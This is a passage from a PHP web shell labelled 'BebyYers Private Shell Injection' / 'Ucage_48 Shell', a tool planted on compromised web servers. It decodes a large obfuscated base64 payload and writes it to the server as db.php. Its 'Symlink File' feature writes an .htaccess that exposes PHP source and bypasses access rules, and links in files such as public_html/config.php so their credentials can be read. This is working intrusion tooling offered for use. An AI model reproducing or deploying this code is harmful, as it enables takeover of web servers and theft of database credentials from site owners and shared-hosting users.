QnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25yR1RDdHc3VFhZMEtPYkVUa1d4c2t3a2lXamVOZ2tkckM3SCs4VHg3bm9reFQ5cWg0ZStHUEw3ZG5zeXF5VWRtRlZiQmRSZEJ0ZG9JdHpHN0Fqb2s3UU5LWWtUanZCR3RyQklwZ3FCZG5nTTZDZ2R6Ly9BYnB6V2d3amk4dXZSbG94U0RsRzJNa0NSdWZyTWRGS3BjM0FLdUJsV293SVdLeG55N2pVRXhnQlNDZEJ0alp1MHp5emMzZUJLRjRlOVkxenlPUFBxcndDM1dsU3RWVldXNnR3UjhOTWtTN2tPamtBWkxsQ0kxcmlSVjRTOHhENW02b3JRaDNCa0U4N3pwNk5wQTJ2QTdERmkzVDlqUzRoajZKSzFnazZ5T1EySmR0K3JrT1BlYWRpSlZFSE5tdTAybzIvK1lJWGxCZHB3bDdtVCtieVhtcjB5alZaWm9ReE96SDZEb28rRGhyMHR2QzlhSmF4aE9LcGtySDZaMTRVeCsyaDRuZjNucTF1RmdJMm9TQmwrUHBlZFZOb0hBNGgwSlFOMS8xb00rQUJsSENoaHY3MDY1akpsRmJjOWVkUmVmUVZWUlFlL3YwdWJYaDljU1hhb0VLNDAzbVFVajFWSTBOYlB0R0d1TVA1QXhyQUE5Z1V1dFprVXRiaUMrbEFjTWVTMWZKSEFkUitVcElmK24yck9ISFlaOTdsLzVGZ0w0eGxkdmhxdE1vU3FYdHkzb2VsNHUvL2hMcUU4MWcwMFdjdjQra1FZSUdzZnBFYXo4YWV6Tk1vR253U05vcUVvWStwUzMzU0Zvb3NvZytvZWpKaytaemx6eFFJMndaWm0yeGFjUnJIOW8vOFVOSEJKTXVPaEZDVUgwZFFVcWNTZklhY0ZxTzJPaTVzbGZLRHVTRzFtajlTQkpnK0RrMmpiNGswaWNxZlllcjlDVVpLODEwK2s1RjUyejArcUZEUzk2bWlOMldkdGE5U1dJZG02Uk1XeVJsVGpsSnRBc2ZTaExyMkNSbDJpSXBjMWFRUkhQem9TU2hUb1lrcDIyU25GTk9rc3pwQjVMRU9qWkptYlpJeXB3eWtsTHhmaGhOV2NrUU5SbWFxc25TWkhIZS92QkZWMVRlRThYcmwxMUhtSjVYbFlNQjVHSUV2MUt3NzZuWXJkM2xaVkJPQnVWalVDNEc3V0c0di9kcWl1NjExOU5vZ2VZU1duMTE5OHBWTmlXVTF2S3VBOWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNGJySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocmtXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXREdGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3REdaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFlzaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZTFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a1N0L2FwVS9LeW5mdE1xZmxKUTNyZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyA/Pg==";
1639 file_put_contents("db.php",base64_decode($script));
1640 echo "<script>alert('done! check db.php'); hideAll();</script>";
1641 echo "<br><p><center><font color=green>Check = >> <a href='db.php' target=_blank><b>db.php</b></a></font></center>";
1642 ?>
1643
1644
1645
1646<center><center><br><div class="info">-== BebyYers Private Shell Injection - BebyYers ==-</div><br>
1647<div class="jaya"><b>
1648<script language="JavaScript"> Year=new Date(); var copyright=Year.getUTCFullYear(); document.write("© Ucage_48 Shell - " + copyright); </script>
1649<b></div></center><br><br>
1650</div>
1651
1652 <?php
1653 die();
1654
1655
1656?>
1657
1658
1659<?php }
1660
1661/* Symlink File */
1662
1663elseif(isset($_GET['x']) && ($_GET['x'] == 'sf')) {@set_time_limit(0);@mkdir('sym',0777);error_reporting(0);
1664$htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1665$op =@fopen ('sym/.htaccess','w');
1666fwrite($op ,$htaccess);
1667echo '<br><br><center><h2>Symlink File !</h2></center><center>
1668<div class="mybox">
1669<form method="post"> File Path:<br>
1670<input class="inputz" type="text" name="file" value="/home/user/public_html/config.php" size="60"/>
1671<br>Symlink Name<br><input class="inputz" type="text" name="symfile" value="s.txt" size="60"/><br><br>
1672<input class="inputzbut" type="submit" value="symlink" name="symlink" /><br><br></form></div></center>';
1673$target = $_POST['file'];
1674$symfile = $_POST['symfile'];
1675$symlink = $_POST['symlink'];
